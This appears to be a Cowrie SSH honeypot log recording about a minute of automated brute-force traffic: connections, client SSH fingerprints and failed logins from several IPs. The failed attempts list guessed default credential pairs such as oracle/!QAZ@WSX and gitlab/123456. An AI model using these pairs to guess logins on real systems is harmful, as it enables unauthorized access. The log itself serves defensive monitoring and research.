{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:47:26.089891Z","src_ip":"41.226.27.251","session":"ba5b277e420c"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:47:26.209974Z","src_ip":"212.227.125.160","session":"49cb3d959172"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:26.254934Z","src_ip":"41.226.27.251","session":"ba5b277e420c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:47:27.481552Z","src_ip":"41.226.27.251","session":"ba5b277e420c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59472,"dst_ip":"1.2.3.4","dst_port":22,"session":"901eb22c64af","protocol":"ssh","message":"New connection: 212.227.235.229:59472 (1.2.3.4:22) [session: 901eb22c64af]","sensor":"my-vps","timestamp":"2025-08-31T02:47:29.432310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:47:30.388344Z","src_ip":"212.227.235.229","session":"901eb22c64af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:47:30.389120Z","src_ip":"212.227.235.229","session":"901eb22c64af"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:35.031852Z","src_ip":"212.227.235.229","session":"901eb22c64af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49408,"dst_ip":"1.2.3.4","dst_port":22,"session":"26dd5014827d","protocol":"ssh","message":"New connection: 212.227.125.160:49408 (1.2.3.4:22) [session: 26dd5014827d]","sensor":"my-vps","timestamp":"2025-08-31T02:47:36.822864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:47:37.446155Z","src_ip":"212.227.125.160","session":"26dd5014827d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:47:37.447268Z","src_ip":"212.227.125.160","session":"26dd5014827d"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:47:37.517174Z","src_ip":"212.227.235.229","session":"901eb22c64af"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"123456789","message":"login attempt [ftptest/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:39.654253Z","src_ip":"212.227.125.160","session":"26dd5014827d"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:47:41.063113Z","src_ip":"212.227.125.160","session":"26dd5014827d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41262,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c0c06694c7e","protocol":"ssh","message":"New connection: 41.226.27.251:41262 (1.2.3.4:22) [session: 6c0c06694c7e]","sensor":"my-vps","timestamp":"2025-08-31T02:47:46.777861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:47:46.778600Z","src_ip":"41.226.27.251","session":"6c0c06694c7e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:47:46.822834Z","src_ip":"41.226.27.251","session":"6c0c06694c7e"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:46.956615Z","src_ip":"41.226.27.251","session":"6c0c06694c7e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:47:48.195351Z","src_ip":"41.226.27.251","session":"6c0c06694c7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55754,"dst_ip":"1.2.3.4","dst_port":22,"session":"95218cd95d2a","protocol":"ssh","message":"New connection: 212.227.125.160:55754 (1.2.3.4:22) [session: 95218cd95d2a]","sensor":"my-vps","timestamp":"2025-08-31T02:47:50.515759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:47:52.550200Z","src_ip":"212.227.125.160","session":"95218cd95d2a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:47:52.550986Z","src_ip":"212.227.125.160","session":"95218cd95d2a"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-31T02:47:58.441482Z","src_ip":"212.227.125.160","session":"95218cd95d2a"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:01.591423Z","src_ip":"212.227.125.160","session":"95218cd95d2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56634,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b4929e3822f","protocol":"ssh","message":"New connection: 212.227.235.229:56634 (1.2.3.4:22) [session: 2b4929e3822f]","sensor":"my-vps","timestamp":"2025-08-31T02:48:03.452408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:05.353376Z","src_ip":"212.227.235.229","session":"2b4929e3822f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:48:05.354390Z","src_ip":"212.227.235.229","session":"2b4929e3822f"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":43288,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef05a0925587","protocol":"ssh","message":"New connection: 41.226.27.251:43288 (1.2.3.4:22) [session: ef05a0925587]","sensor":"my-vps","timestamp":"2025-08-31T02:48:06.864790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:06.867444Z","src_ip":"41.226.27.251","session":"ef05a0925587"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:48:06.912339Z","src_ip":"41.226.27.251","session":"ef05a0925587"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-31T02:48:07.101391Z","src_ip":"41.226.27.251","session":"ef05a0925587"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:08.295674Z","src_ip":"41.226.27.251","session":"ef05a0925587"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-31T02:48:15.598899Z","src_ip":"212.227.235.229","session":"2b4929e3822f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39596,"dst_ip":"1.2.3.4","dst_port":22,"session":"28c1fa432073","protocol":"ssh","message":"New connection: 212.227.235.229:39596 (1.2.3.4:22) [session: 28c1fa432073]","sensor":"my-vps","timestamp":"2025-08-31T02:48:15.799212Z"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.212","src_port":33796,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e0844711791","protocol":"ssh","message":"New connection: 154.209.4.212:33796 (1.2.3.4:22) [session: 6e0844711791]","sensor":"my-vps","timestamp":"2025-08-31T02:48:16.817301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:16.818322Z","src_ip":"154.209.4.212","session":"6e0844711791"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T02:48:17.029342Z","src_ip":"154.209.4.212","session":"6e0844711791"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:17.034421Z","src_ip":"212.227.235.229","session":"28c1fa432073"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:48:17.035161Z","src_ip":"212.227.235.229","session":"28c1fa432073"}
{"eventid":"cowrie.session.closed","duration":"16.3","message":"Connection lost after 16.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:19.770530Z","src_ip":"212.227.235.229","session":"2b4929e3822f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33844,"dst_ip":"1.2.3.4","dst_port":22,"session":"22912d6fef78","protocol":"ssh","message":"New connection: 212.227.125.160:33844 (1.2.3.4:22) [session: 22912d6fef78]","sensor":"my-vps","timestamp":"2025-08-31T02:48:19.964466Z"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"password","message":"login attempt [ftptest/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:48:22.654096Z","src_ip":"212.227.235.229","session":"28c1fa432073"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:24.377963Z","src_ip":"212.227.235.229","session":"28c1fa432073"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:24.819384Z","src_ip":"154.209.4.212","session":"6e0844711791"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:26.203625Z","src_ip":"212.227.125.160","session":"22912d6fef78"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:48:26.204836Z","src_ip":"212.227.125.160","session":"22912d6fef78"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41062,"dst_ip":"1.2.3.4","dst_port":22,"session":"011340bbbffa","protocol":"ssh","message":"New connection: 41.226.27.251:41062 (1.2.3.4:22) [session: 011340bbbffa]","sensor":"my-vps","timestamp":"2025-08-31T02:48:27.042074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:27.043432Z","src_ip":"41.226.27.251","session":"011340bbbffa"}
